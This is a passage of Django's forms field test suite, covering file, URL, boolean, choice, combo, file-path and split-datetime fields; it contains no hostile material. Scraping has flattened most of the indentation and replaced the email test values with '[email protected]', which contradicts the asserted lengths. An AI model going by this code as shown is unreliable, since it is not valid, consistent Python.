ValidationError, "'No file was submitted. Check the encoding type on the form.'",
f.clean, 'some content that is not a file'
)
self.assertRaisesMessage(
ValidationError, "'The submitted file is empty.'",
f.clean, SimpleUploadedFile('name', None)
)
self.assertRaisesMessage(
ValidationError, "'The submitted file is empty.'",
f.clean, SimpleUploadedFile('name', b'')
)
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
self.assertIsInstance(
f.clean(SimpleUploadedFile('我隻氣墊船裝滿晒鱔.txt', 'मेरी मँडराने वाली नाव सर्पमीनों से भरी ह'.encode('utf-8'))),
SimpleUploadedFile
)
self.assertIsInstance(
f.clean(SimpleUploadedFile('name', b'Some File Content'), 'files/test4.pdf'),
SimpleUploadedFile
)
def test_filefield_2(self):
f = FileField(max_length=5)
self.assertRaisesMessage(
ValidationError, "'Ensure this filename has at most 5 characters (it has 18).'",
f.clean, SimpleUploadedFile('test_maxlength.txt', b'hello world')
)
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
def test_filefield_3(self):
f = FileField(allow_empty_file=True)
self.assertEqual(SimpleUploadedFile,
type(f.clean(SimpleUploadedFile('name', b''))))
def test_filefield_changed(self):
        """
        Test the behavior of has_changed for FileField. The value of data will
        most likely come from request.FILES. The value of initial data will
        likely be a filename stored in the database. Since its value is of no
        use to a FileField, it is ignored.
        """
f = FileField()
# No file was uploaded and no initial data.
self.assertFalse(f.has_changed('', None))
# A file was uploaded and no initial data.
self.assertTrue(f.has_changed('', {'filename': 'resume.txt', 'content': 'My resume'}))
# A file was not uploaded, but there is initial data
self.assertFalse(f.has_changed('resume.txt', None))
# A file was uploaded and there is initial data (file identity is not dealt
# with here)
self.assertTrue(f.has_changed('resume.txt', {'filename': 'resume.txt', 'content': 'My resume'}))
# ImageField ##################################################################
@skipIf(Image is None, "Pillow is required to test ImageField")
def test_imagefield_annotate_with_image_after_clean(self):
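        # ImageField.to_python verifies the upload with Pillow and annotates the
        # cleaned file with what it detected, overriding the spoofed 'text/plain'
        # content type supplied below.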
f = ImageField()
img_path = os.path.dirname(upath(__file__)) + '/filepath_test_files/1x1.png'
with open(img_path, 'rb') as img_file:
img_data = img_file.read()
img_file = SimpleUploadedFile('1x1.png', img_data)
img_file.content_type = 'text/plain'
uploaded_file = f.clean(img_file)
self.assertEqual('PNG', uploaded_file.image.format)
self.assertEqual('image/png', uploaded_file.content_type)
@skipIf(Image is None, "Pillow is required to test ImageField")
def test_imagefield_annotate_with_bitmap_image_after_clean(self):
"""
This also tests the situation when Pillow doesn't detect the MIME type
of the image (#24948).
"""
from PIL.BmpImagePlugin import BmpImageFile
try:
Image.register_mime(BmpImageFile.format, None)
f = ImageField()
img_path = os.path.dirname(upath(__file__)) + '/filepath_test_files/1x1.bmp'
with open(img_path, 'rb') as img_file:
img_data = img_file.read()
img_file = SimpleUploadedFile('1x1.bmp', img_data)
img_file.content_type = 'text/plain'
uploaded_file = f.clean(img_file)
self.assertEqual('BMP', uploaded_file.image.format)
self.assertIsNone(uploaded_file.content_type)
finally:
Image.register_mime(BmpImageFile.format, 'image/bmp')
# URLField ##################################################################
def test_urlfield_1(self):
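        # URLField assumes an 'http://' scheme when the input has none, so bare
        # domains like 'valid-with-hyphens.com' clean to fully-qualified URLs.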
f = URLField()
self.assertWidgetRendersTo(f, '<input type="url" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('http://localhost', f.clean('http://localhost'))
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertEqual('http://example.com.', f.clean('http://example.com.'))
self.assertEqual('http://www.example.com', f.clean('http://www.example.com'))
self.assertEqual('http://www.example.com:8000/test', f.clean('http://www.example.com:8000/test'))
self.assertEqual('http://valid-with-hyphens.com', f.clean('valid-with-hyphens.com'))
self.assertEqual('http://subdomain.domain.com', f.clean('subdomain.domain.com'))
self.assertEqual('http://200.8.9.10', f.clean('http://200.8.9.10'))
self.assertEqual('http://200.8.9.10:8000/test', f.clean('http://200.8.9.10:8000/test'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'com.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://invalid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://-invalid.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.alid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.-alid.com')
self.assertEqual('http://valid-----hyphens.com', f.clean('http://valid-----hyphens.com'))
self.assertEqual(
'http://some.idn.xyz\xe4\xf6\xfc\xdfabc.domain.com:123/blah',
f.clean('http://some.idn.xyzäöüßabc.domain.com:123/blah')
)
self.assertEqual(
'http://www.example.com/s/http://code.djangoproject.com/ticket/13804',
f.clean('www.example.com/s/http://code.djangoproject.com/ticket/13804')
)
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '[a')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://[a')
def test_url_regex_ticket11198(self):
f = URLField()
        # hangs "forever" if the catastrophic backtracking from #11198 isn't fixed
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X" * 200,))
# a second test, to make sure the problem is really addressed, even on
# domains that don't fail the domain label length check in the regex
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X" * 60,))
def test_urlfield_2(self):
f = URLField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertEqual('http://www.example.com', f.clean('http://www.example.com'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
def test_urlfield_5(self):
f = URLField(min_length=15, max_length=20)
self.assertWidgetRendersTo(f, '<input id="id_f" type="url" name="f" maxlength="20" />')
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at least 15 characters (it has 12).'",
f.clean, 'http://f.com'
)
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 20 characters (it has 37).'",
f.clean, 'http://abcdefghijklmnopqrstuvwxyz.com'
)
def test_urlfield_6(self):
f = URLField(required=False)
self.assertEqual('http://example.com', f.clean('example.com'))
self.assertEqual('', f.clean(''))
self.assertEqual('https://example.com', f.clean('https://example.com'))
def test_urlfield_7(self):
f = URLField()
self.assertEqual('http://example.com', f.clean('http://example.com'))
self.assertEqual('http://example.com/test', f.clean('http://example.com/test'))
self.assertEqual('http://example.com?some_param=some_value',
f.clean('http://example.com?some_param=some_value'))
def test_urlfield_9(self):
f = URLField()
urls = (
'http://עברית.idn.icann.org/',
'http://sãopaulo.com/',
'http://sãopaulo.com.br/',
'http://пример.испытание/',
'http://مثال.إختبار/',
'http://例子.测试/',
'http://例子.測試/',
'http://उदाहरण.परीक्षा/',
'http://例え.テスト/',
'http://مثال.آزمایشی/',
'http://실례.테스트/',
'http://العربية.idn.icann.org/',
)
for url in urls:
# Valid IDN
self.assertEqual(url, f.clean(url))
def test_urlfield_10(self):
"""Test URLField correctly validates IPv6 (#18779)."""
f = URLField()
urls = (
'http://[12:34::3a53]/',
'http://[a34:9238::]:8080/',
)
for url in urls:
self.assertEqual(url, f.clean(url))
def test_urlfield_not_string(self):
f = URLField(required=False)
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 23)
def test_urlfield_normalization(self):
f = URLField()
self.assertEqual(f.clean('http://example.com/ '), 'http://example.com/')
# BooleanField ################################################################
def test_booleanfield_1(self):
f = BooleanField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(True, f.clean(True))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, False)
self.assertEqual(True, f.clean(1))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 0)
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(True, f.clean('True'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 'False')
def test_booleanfield_2(self):
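        # BooleanField.to_python compares string input case-insensitively, so
        # 'False', 'false', 'FaLsE' (and '0') all clean to False on a
        # non-required field.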
f = BooleanField(required=False)
self.assertEqual(False, f.clean(''))
self.assertEqual(False, f.clean(None))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertEqual(True, f.clean(1))
self.assertEqual(False, f.clean(0))
self.assertEqual(True, f.clean('1'))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(False, f.clean('False'))
self.assertEqual(False, f.clean('false'))
self.assertEqual(False, f.clean('FaLsE'))
def test_boolean_picklable(self):
self.assertIsInstance(pickle.loads(pickle.dumps(BooleanField())), BooleanField)
def test_booleanfield_changed(self):
f = BooleanField()
self.assertFalse(f.has_changed(None, None))
self.assertFalse(f.has_changed(None, ''))
self.assertFalse(f.has_changed('', None))
self.assertFalse(f.has_changed('', ''))
self.assertTrue(f.has_changed(False, 'on'))
self.assertFalse(f.has_changed(True, 'on'))
self.assertTrue(f.has_changed(True, ''))
# Initial value may have mutated to a string due to show_hidden_initial (#19537)
self.assertTrue(f.has_changed('False', 'on'))
# ChoiceField #################################################################
def test_choicefield_1(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, '3'
)
def test_choicefield_2(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, '3'
)
def test_choicefield_3(self):
f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')])
self.assertEqual('J', f.clean('J'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. John is not one of the available choices.'",
f.clean, 'John'
)
def test_choicefield_4(self):
f = ChoiceField(
choices=[
('Numbers', (('1', 'One'), ('2', 'Two'))),
('Letters', (('3', 'A'), ('4', 'B'))), ('5', 'Other'),
]
)
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertEqual('3', f.clean(3))
self.assertEqual('3', f.clean('3'))
self.assertEqual('5', f.clean(5))
self.assertEqual('5', f.clean('5'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 6 is not one of the available choices.'",
f.clean, '6'
)
def test_choicefield_callable(self):
choices = lambda: [('J', 'John'), ('P', 'Paul')]
f = ChoiceField(choices=choices)
self.assertEqual('J', f.clean('J'))
def test_choicefield_callable_may_evaluate_to_different_values(self):
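        # The callable is re-evaluated every time a form is instantiated, so
        # rebinding the enclosing ``choices`` name changes what later forms see.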
choices = []
def choices_as_callable():
return choices
class ChoiceFieldForm(Form):
choicefield = ChoiceField(choices=choices_as_callable)
choices = [('J', 'John')]
form = ChoiceFieldForm()
self.assertEqual([('J', 'John')], list(form.fields['choicefield'].choices))
choices = [('P', 'Paul')]
form = ChoiceFieldForm()
self.assertEqual([('P', 'Paul')], list(form.fields['choicefield'].choices))
def test_choicefield_disabled(self):
f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')], disabled=True)
self.assertWidgetRendersTo(f,
'<select id="id_f" name="f" disabled><option value="J">John</option>'
'<option value="P">Paul</option></select>')
# TypedChoiceField ############################################################
# TypedChoiceField is just like ChoiceField, except that coerced types will
# be returned:
def test_typedchoicefield_1(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual(1, f.clean('1'))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 2 is not one of the available choices.'",
f.clean, '2'
)
def test_typedchoicefield_2(self):
# Different coercion, same validation.
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual(1.0, f.clean('1'))
def test_typedchoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual(True, f.clean('-1'))
def test_typedchoicefield_4(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, you'll still get a validation error. Don't do this!
f = TypedChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. B is not one of the available choices.'",
f.clean, 'B'
)
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_typedchoicefield_5(self):
# Non-required fields aren't required
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual('', f.clean(''))
# If you want cleaning an empty value to return a different type, tell the field
def test_typedchoicefield_6(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertIsNone(f.clean(''))
def test_typedchoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f.has_changed(None, ''))
self.assertFalse(f.has_changed(1, '1'))
self.assertFalse(f.has_changed('1', '1'))
def test_typedchoicefield_special_coerce(self):
"""
Test a coerce function which results in a value not present in choices.
Refs #21397.
"""
def coerce_func(val):
return Decimal('1.%s' % val)
f = TypedChoiceField(choices=[(1, "1"), (2, "2")], coerce=coerce_func, required=True)
self.assertEqual(Decimal('1.2'), f.clean('2'))
self.assertRaisesMessage(
ValidationError, "'This field is required.'",
f.clean, ''
)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, '3'
)
# NullBooleanField ############################################################
def test_nullbooleanfield_1(self):
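        # NullBooleanField cleans 'True'/'true'/'1' to True and
        # 'False'/'false'/'0' to False; any other value ('2', '3', 'hello')
        # cleans to None.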
f = NullBooleanField()
self.assertIsNone(f.clean(''))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertIsNone(f.clean(None))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('1'))
self.assertIsNone(f.clean('2'))
self.assertIsNone(f.clean('3'))
self.assertIsNone(f.clean('hello'))
self.assertEqual(True, f.clean('true'))
self.assertEqual(False, f.clean('false'))
def test_nullbooleanfield_2(self):
# Make sure that the internal value is preserved if using HiddenInput (#7753)
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm()
self.assertHTMLEqual(
'<input type="hidden" name="hidden_nullbool1" value="True" id="id_hidden_nullbool1" />'
'<input type="hidden" name="hidden_nullbool2" value="False" id="id_hidden_nullbool2" />',
str(f)
)
def test_nullbooleanfield_3(self):
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm({'hidden_nullbool1': 'True', 'hidden_nullbool2': 'False'})
self.assertIsNone(f.full_clean())
self.assertEqual(True, f.cleaned_data['hidden_nullbool1'])
self.assertEqual(False, f.cleaned_data['hidden_nullbool2'])
def test_nullbooleanfield_4(self):
# Make sure we're compatible with MySQL, which uses 0 and 1 for its boolean
# values. (#9609)
NULLBOOL_CHOICES = (('1', 'Yes'), ('0', 'No'), ('', 'Unknown'))
class MySQLNullBooleanForm(Form):
nullbool0 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool1 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool2 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
f = MySQLNullBooleanForm({'nullbool0': '1', 'nullbool1': '0', 'nullbool2': ''})
self.assertIsNone(f.full_clean())
self.assertEqual(True, f.cleaned_data['nullbool0'])
self.assertEqual(False, f.cleaned_data['nullbool1'])
self.assertIsNone(f.cleaned_data['nullbool2'])
def test_nullbooleanfield_changed(self):
f = NullBooleanField()
self.assertTrue(f.has_changed(False, None))
self.assertTrue(f.has_changed(None, False))
self.assertFalse(f.has_changed(None, None))
self.assertFalse(f.has_changed(False, False))
self.assertTrue(f.has_changed(True, False))
self.assertTrue(f.has_changed(True, None))
self.assertTrue(f.has_changed(True, False))
# MultipleChoiceField #########################################################
def test_multiplechoicefield_1(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, ())
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, ['3']
)
def test_multiplechoicefield_2(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual([], f.clean(''))
self.assertEqual([], f.clean(None))
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertEqual([], f.clean([]))
self.assertEqual([], f.clean(()))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, ['3']
)
def test_multiplechoicefield_3(self):
f = MultipleChoiceField(
choices=[('Numbers', (('1', 'One'), ('2', 'Two'))), ('Letters', (('3', 'A'), ('4', 'B'))), ('5', 'Other')]
)
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '5'], f.clean([1, 5]))
self.assertEqual(['1', '5'], f.clean([1, '5']))
self.assertEqual(['1', '5'], f.clean(['1', 5]))
self.assertEqual(['1', '5'], f.clean(['1', '5']))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 6 is not one of the available choices.'",
f.clean, ['6']
)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 6 is not one of the available choices.'",
f.clean, ['1', '6']
)
def test_multiplechoicefield_changed(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two'), ('3', 'Three')])
self.assertFalse(f.has_changed(None, None))
self.assertFalse(f.has_changed([], None))
self.assertTrue(f.has_changed(None, ['1']))
self.assertFalse(f.has_changed([1, 2], ['1', '2']))
self.assertFalse(f.has_changed([2, 1], ['1', '2']))
self.assertTrue(f.has_changed([1, 2], ['1']))
self.assertTrue(f.has_changed([1, 2], ['1', '3']))
# TypedMultipleChoiceField ############################################################
# TypedMultipleChoiceField is just like MultipleChoiceField, except that coerced types
# will be returned:
def test_typedmultiplechoicefield_1(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1], f.clean(['1']))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 2 is not one of the available choices.'",
f.clean, ['2']
)
def test_typedmultiplechoicefield_2(self):
# Different coercion, same validation.
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual([1.0], f.clean(['1']))
def test_typedmultiplechoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual([True], f.clean(['-1']))
def test_typedmultiplechoicefield_4(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1, -1], f.clean(['1', '-1']))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 2 is not one of the available choices.'",
f.clean, ['1', '2']
)
def test_typedmultiplechoicefield_5(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, you'll still get a validation error. Don't do this!
f = TypedMultipleChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. B is not one of the available choices.'",
f.clean, ['B']
)
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
def test_typedmultiplechoicefield_6(self):
# Non-required fields aren't required
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual([], f.clean([]))
def test_typedmultiplechoicefield_7(self):
# If you want cleaning an empty value to return a different type, tell the field
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertIsNone(f.clean([]))
def test_typedmultiplechoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f.has_changed(None, ''))
def test_typedmultiplechoicefield_special_coerce(self):
"""
Test a coerce function which results in a value not present in choices.
Refs #21397.
"""
def coerce_func(val):
return Decimal('1.%s' % val)
f = TypedMultipleChoiceField(
choices=[(1, "1"), (2, "2")], coerce=coerce_func, required=True)
self.assertEqual([Decimal('1.2')], f.clean(['2']))
        self.assertRaisesMessage(
            ValidationError, "'This field is required.'",
            f.clean, []
        )
        self.assertRaisesMessage(
            ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
            f.clean, ['3']
        )
# ComboField ##################################################################
def test_combofield_1(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()])
        self.assertEqual('[email protected]', f.clean('[email protected]'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 20 characters (it has 28).'",
            f.clean, '[email protected]'
)
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_combofield_2(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()], required=False)
self.assertEqual('[email protected]', f.clean('[email protected]'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 20 characters (it has 28).'",
f.clean, '[email protected]'
)
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
# FilePathField ###############################################################
def test_filepathfield_1(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
self.assertTrue(fix_os_paths(path).endswith('/django/forms/'))
def test_filepathfield_2(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
f = FilePathField(path=path)
f.choices = [p for p in f.choices if p[0].endswith('.py')]
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/boundfield.py', 'boundfield.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/utils.py', 'utils.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. fields.py is not one of the available choices.'",
f.clean, 'fields.py'
)
        self.assertTrue(fix_os_paths(f.clean(path + 'fields.py')).endswith('/django/forms/fields.py'))
def test_filepathfield_3(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
        f = FilePathField(path=path, match=r'^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/boundfield.py', 'boundfield.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/utils.py', 'utils.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_4(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
        f = FilePathField(path=path, recursive=True, match=r'^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/boundfield.py', 'boundfield.py'),
('/django/forms/extras/__init__.py', 'extras/__init__.py'),
('/django/forms/extras/widgets.py', 'extras/widgets.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/utils.py', 'utils.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_folders(self):
path = os.path.dirname(upath(__file__)) + '/filepath_test_files/'
f = FilePathField(path=path, allow_folders=True, allow_files=False)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
f = FilePathField(path=path, allow_folders=True, allow_files=True)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/.dot-file', '.dot-file'),
('/tests/forms_tests/tests/filepath_test_files/1x1.bmp', '1x1.bmp'),
('/tests/forms_tests/tests/filepath_test_files/1x1.png', '1x1.png'),
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
('/tests/forms_tests/tests/filepath_test_files/fake-image.jpg', 'fake-image.jpg'),
('/tests/forms_tests/tests/filepath_test_files/real-text-file.txt', 'real-text-file.txt'),
]
actual = fix_os_paths(f.choices)
self.assertEqual(len(expected), len(actual))
for exp, got in zip(expected, actual):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
# SplitDateTimeField ##########################################################
def test_splitdatetimefield_1(self):
from django.forms.widgets import SplitDateTimeWidget
f = SplitDateTimeField()
self.assertIsInstance(f.widget, SplitDateTimeWidget)
self.assertEqual(
datetime.datetime(2006, 1, 10, 7, 30),
f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(
self, ValidationError, "'Enter a valid date\.', u?'Enter a valid time\.'",
f.clean, ['hello', 'there']
)
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
def test_splitdatetimefield_2(self):
f = SplitDateTimeField(required=False)
self.assertEqual(
datetime.datetime(2006, 1, 10, 7, 30),
f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
)
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean(['2006-01-10', '07:30']))
self.assertIsNone(f.clean(None))
self.assertIsNone(f.clean(''))
self.assertIsNone(f.clean(['']))
self.assertIsNone(f.clean(['', '']))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(
self, ValidationError, "'Enter a valid date\.', u?'Enter a valid time\.'",
f.clean, ['hello', 'there']
)
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', ''])
